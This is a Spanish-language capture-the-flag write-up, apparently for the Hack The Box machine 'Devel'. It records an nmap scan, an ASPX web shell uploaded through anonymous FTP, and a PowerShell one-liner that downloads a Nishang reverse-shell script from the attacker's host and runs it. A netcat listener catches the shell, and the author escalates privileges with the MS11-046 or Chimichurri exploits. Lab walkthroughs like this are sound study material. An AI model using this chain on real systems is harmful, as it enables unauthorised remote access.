Esta es la segunda vez que hago esto pero esta vez sin metasploit.
Lo primero que nos damos cuenta con el nmap es que esta FTP con acceso anónimo y el asp
root@Kali2:~/Downloads# nmap -sC -sV -O 10.10.10.5 Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-03 19:39 CET Nmap scan report for 10.10.10.5 Host is up (0.022s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM <DIR> aspnet_client | 03-17-17 04:37PM 689 iisstart.htm |_03-17-17 04:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.73 seconds
Como la maquina era muy lenta en vez de conectarme por FTP entre con filezilla
Subí la shell que esta en kali
root@Kali2:~/Desktop# locate cmd.aspx /usr/share/davtest/backdoors/aspx_cmd.aspx
Y puedes entrar por el browser a http://10.10.10.5/aspx_cmd.aspx
Desde ahí lo normal. Nishang
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/powershellreverse2.ps1')
root@Kali2:~/Desktop# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.5] 49167 Windows PowerShell running as user DEVEL$ on DEVEL Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\windows\system32\inetsrv>
Con systeminfo
PS C:\windows\system32\inetsrv> systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ??
System Boot Time: 7/11/2019, 4:33:20 ??
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 689 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.458 MB
Virtual Memory: In Use: 589 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
Vemos que es exactamente lo mismo que artic asi que podemos hacer priv esc con chimichurri o con ms11046 https://github.com/abatchy17/WindowsExploits
Solo ejecutandolo me da una shell
